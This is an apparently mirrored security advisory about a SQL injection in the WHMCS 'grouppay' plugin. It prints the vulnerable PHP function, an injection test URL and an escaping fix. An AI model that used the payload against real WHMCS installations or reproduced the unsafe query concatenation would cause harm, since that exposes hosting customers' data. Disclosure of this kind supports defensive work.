####################################################################### Tile: WHMCS grouppay plugin SQL Injection <= 1.5 Author: HJauditing Employee Tim E-mail: Tim@HJauditing.com Web: http://hjauditing.com/ Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html ####################################################################### ============ Introduction ============ We have found a SQL injection inside the group pay plugin for WHCMS. A lot of game hosting companies are using this plugin. SQL Injection is in the function gp_LoadUserFromHash. ============ Exploits ============ - SQL Injection grouppay.php?hash=%hash%' and '1'='1 ============ Code SQL Injection ============ /modules/addons/group_pay/functions_hash.php function gp_LoadUserFromHash($hash) { //Kill the Dashes $hash = str_replace ( "-", "", $hash ); $result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" ); if($result){ $row = mysql_fetch_row ( $result ); return $row [0]; }else{ return false; } } ============ Fix ============ /modules/addons/group_pay/functions_hash.php function gp_LoadUserFromHash($hash) { //Kill the Dashes $hash = str_replace ( "-", "", $hash ); $hash = mysql_real_escape_string($hash); $result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" ); if($result){ $row = mysql_fetch_row ( $result ); return $row [0]; }else{ return false; } } #######################################################################?
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论